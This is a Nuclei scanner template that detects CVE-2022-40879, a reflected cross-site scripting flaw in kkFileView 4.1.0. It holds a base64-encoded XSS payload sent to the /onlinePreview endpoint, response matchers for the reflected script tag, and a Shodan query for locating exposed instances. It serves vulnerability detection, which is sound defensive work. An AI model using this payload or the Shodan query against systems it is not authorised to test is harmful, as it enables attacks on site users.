nuclei-templates/http/cves/2022/CVE-2022-40879.yaml

54 lines
2.0 KiB
YAML

id: CVE-2022-40879
info:
name: kkFileView 4.1.0 - Cross-Site Scripting
author: arafatansari,co5mos
severity: medium
description: |
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://github.com/kekingcn/kkFileView/issues/389
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-40879
cwe-id: CWE-79
epss-score: 0.02006
epss-percentile: 0.87606
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: keking
product: kkfileview
shodan-query: http.html:"kkFileView"
tags: cve,cve2022,kkFileView,xss,keking
http:
- method: GET
path:
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- '该文件不'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022047dfe8aae27000ca67ee23ab329531f941702ca936d1e7ada7d42fc851cbe427022100f8fe68d36c2b725ff0a534024151706cd35ea1fc780a330e38faafbc75752516:922c64590222798bb761d5b6d8e72950